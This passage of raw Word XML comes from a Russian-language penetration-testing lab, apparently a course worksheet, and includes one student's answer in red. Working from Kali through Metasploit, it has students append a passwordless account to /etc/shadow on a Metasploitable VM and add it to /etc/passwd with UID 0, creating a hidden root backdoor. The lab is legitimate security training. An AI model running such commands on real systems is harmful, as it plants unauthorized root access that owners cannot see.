        <w:t>дату окончания срока действия пароля. Последнее поле зарезервировано для использования</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>будущем.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65303E11" w14:textId="17657FBD" w:rsidR="00D94868" w:rsidRPr="00320420" w:rsidRDefault="00320420" w:rsidP="00320420">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
      </w:pPr>
      <w:r>
        <w:t>Для того чтобы узнать больше</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> о </w:t>
      </w:r>
      <w:r>
        <w:t>файле</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, введите команду </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>man shadow</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>командной строке терминала.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE0A059" w14:textId="4709C5A3" w:rsidR="00364E35" w:rsidRDefault="002E3DC3" w:rsidP="00B40DFE">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t>Вернитесь</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> к </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">терминалу среды Metasploit на виртуальной машине Kali. Сейчас вы добавите нового пользователя </w:t>
      </w:r>
      <w:r w:rsidR="00F336F6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>myroot</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на виртуальную машину Metasploitable. Этот пользователь будет иметь такую же конфигурацию пароля, что</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidR="00B90567">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5296165E" w14:textId="490830D3" w:rsidR="00025C56" w:rsidRDefault="00E03260" w:rsidP="00783D3C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
      </w:pPr>
      <w:r>
        <w:t>При создании нового пользователя вы будете использовать те же значения описанных</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> 9 </w:t>
      </w:r>
      <w:r>
        <w:t>полей, что</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>пользователь</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t>правами root; за исключением того, что вы удалите зашифрованный пароль, связанный</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">пользователем </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90567">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>оставите поле пароля пустым.</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> С </w:t>
      </w:r>
      <w:r>
        <w:t>пустым полем пароля для входа</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>систему</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">качестве пользователя </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>myroot</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> пароль не требуется.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D92B5B" w14:textId="72427693" w:rsidR="00B90567" w:rsidRDefault="002461ED" w:rsidP="002461ED">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Команда </w:t>
      </w:r>
      <w:r w:rsidRPr="00025C56">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> будет добавлять новую строку</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">данными нового пользователя </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>myroot</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>файл/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299BD055" w14:textId="6F20C958" w:rsidR="00A258CE" w:rsidRPr="00225535" w:rsidRDefault="00A258CE" w:rsidP="002461ED">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Примечание</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Убедитесь, что вы ввели два знака больше (&gt;), иначе будет перезаписан текущий файл </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59940D77" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="00225535" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>echo "myroot::14747:0:99999:7:::" &gt;&gt; /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD57E1A" w14:textId="5523BF99" w:rsidR="00A258CE" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Убедитесь, что добавлен новый пользователь </w:t>
      </w:r>
      <w:r w:rsidRPr="008B5392">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>myroot</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">файл </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C536630" w14:textId="207B8612" w:rsidR="00A258CE" w:rsidRPr="008855F4" w:rsidRDefault="00FD0323" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3447E1" w14:textId="07BA47E5" w:rsidR="00F01C8C" w:rsidRPr="008855F4" w:rsidRDefault="00F01C8C" w:rsidP="00E60D5A">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;output omitted&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068428DE" w14:textId="1BB8B954" w:rsidR="00A258CE" w:rsidRDefault="00A258CE" w:rsidP="00E60D5A">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
      </w:pPr>
      <w:r>
        <w:t>myroot::14747:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A562B6" w14:textId="5A549EED" w:rsidR="00FB749C" w:rsidRDefault="00FB749C" w:rsidP="00FB749C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Почему было необходимо скопировать содержимое файла </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/etc/shadow</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>новый текстовый файл на ВМ Kali?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AA8A3C" w14:textId="6579BE63" w:rsidR="00B60E1B" w:rsidRDefault="00FB749C" w:rsidP="00FB749C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Подсказка</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Что произойдет, если ввести </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cat /etc/shadow &gt; /root/shadow.txt</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00B60E1B">
        <w:t>консоли среды Metasploit?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A43FE6A" w14:textId="6961167C" w:rsidR="00B60E1B" w:rsidRPr="00981055" w:rsidRDefault="00981055" w:rsidP="00B60E1B">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00981055">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Файл </w:t>
      </w:r>
      <w:r w:rsidRPr="00981055">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shadow</w:t>
      </w:r>
      <w:r w:rsidRPr="00981055">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> будет скопирован в </w:t>
      </w:r>
      <w:r w:rsidRPr="00981055">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shadow</w:t>
      </w:r>
      <w:r w:rsidRPr="00981055">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00981055">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00981055">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> на тачке </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00981055">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="488B0FDD" w14:textId="7113373D" w:rsidR="0076279C" w:rsidRPr="0042041D" w:rsidRDefault="00B90567" w:rsidP="00B90567">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve">Для того чтобы разрешить </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0042041D">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>myroot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> выполнить вход</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7" w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>систему</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7" w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve">повышенными правами, нужно пользователя </w:t>
      </w:r>
      <w:r w:rsidRPr="0042041D">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>myroot</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7" w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>таким же номером идентификатора пользователя (UID), номером идентификатора группы пользователя (GID), описанием пользователя, главным каталогом пользователя</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7" w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>оболочкой входа</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7" w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>систему, как</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7" w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve">пользователя </w:t>
      </w:r>
      <w:r w:rsidR="008F5730" w:rsidRPr="0042041D">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>, добавить</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7" w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve">файл </w:t>
      </w:r>
      <w:r w:rsidRPr="0042041D">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>. Поля разделены двоеточиями (:),</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7" w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> а </w:t>
      </w:r>
      <w:r w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>символ</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7" w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7" w:rsidRPr="0042041D">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7" w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>во втором поле представляет пароль для данного пользователя. Зашифрованный пароль можно найти</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7" w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r w:rsidRPr="0042041D">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>файле /etc/shadow для такого же пользователя.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6CA662" w14:textId="409088F9" w:rsidR="00B90567" w:rsidRDefault="00E60D5A" w:rsidP="0076279C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
      </w:pPr>
      <w:r>
        <w:t>Вернитесь</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>окно удаленного подключения терминала</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> к </w:t>
      </w:r>
      <w:r>
        <w:t>ВМ Metasploitable</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">введите команду </w:t>
      </w:r>
      <w:r w:rsidR="00336913">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">cat </w:t>
      </w:r>
      <w:r>
        <w:t>для просмотра информации</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> о </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">пользователе </w:t>
      </w:r>
      <w:r w:rsidR="00336913">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581E4B5F" w14:textId="48E4850C" w:rsidR="00B90567" w:rsidRPr="008855F4" w:rsidRDefault="00B90567" w:rsidP="008F5730">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>cat /etc/passwd | grep root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D10B49" w14:textId="5174749B" w:rsidR="008F5730" w:rsidRPr="008855F4" w:rsidRDefault="008F5730" w:rsidP="00E60D5A">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>root:x:0:0:root:/root:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAA3211" w14:textId="0D7858F2" w:rsidR="00336913" w:rsidRDefault="00336913" w:rsidP="00336913">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Используйте следующую команду </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">echo </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">для добавления параметров для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>myroot</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>файл /etc/password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B46B7B" w14:textId="77777777" w:rsidR="00E60D5A" w:rsidRDefault="00E60D5A" w:rsidP="00E60D5A">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Примечание</w:t>
      </w:r>
      <w:r>
        <w:t>. Убедитесь, что вы ввели два знака больше (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>), иначе будет перезаписан текущий файл /etc/passwd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6123C0CE" w14:textId="432842E4" w:rsidR="008F5730" w:rsidRPr="008855F4" w:rsidRDefault="008F5730" w:rsidP="008F5730">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t xml:space="preserve"> "myroot:x:0:0:root:/root:/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>" &gt;&gt; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="42A3AF54" w14:textId="0D8F3D11" w:rsidR="000B066F" w:rsidRDefault="000B066F" w:rsidP="000B066F">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
      </w:pPr>
      <w:r>
        <w:t>Для того чтобы узнать больше</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> о </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">файле /etc/passwd, введите </w:t>
      </w:r>
      <w:r w:rsidRPr="000B066F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>man</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7" w:rsidRPr="000B066F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 5</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000B066F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>командной строке терминала.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A003C47" w14:textId="543CFC30" w:rsidR="008F5730" w:rsidRDefault="008F5730" w:rsidP="008F5730">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Убедитесь, что добавлен новый пользователь </w:t>
      </w:r>
      <w:r w:rsidRPr="008B5392">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>myroot</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">в файл </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFC358E" w14:textId="201983F3" w:rsidR="008F5730" w:rsidRPr="008855F4" w:rsidRDefault="008F5730" w:rsidP="008F5730">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529F6B44" w14:textId="77777777" w:rsidR="008F5730" w:rsidRPr="008855F4" w:rsidRDefault="008F5730" w:rsidP="008F5730">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;output omitted&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E2F202" w14:textId="4506B1B6" w:rsidR="008F5730" w:rsidRPr="008855F4" w:rsidRDefault="008F5730" w:rsidP="008F5730">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>myroot:x:0:0:root:/root:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6721C9" w14:textId="6528FB06" w:rsidR="00B90567" w:rsidRDefault="00B90567" w:rsidP="00920CF6">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
      </w:pPr>
      <w:r>
        <w:t>Благодаря доступу</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">правами root пользователь </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>myroot</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> получает полный контроль над ВМ Metasploitable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17206F91" w14:textId="5CE0E2BC" w:rsidR="00A258CE" w:rsidRPr="00225535" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Закончив работу, введите </w:t>
      </w:r>
      <w:r w:rsidRPr="008B5392">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
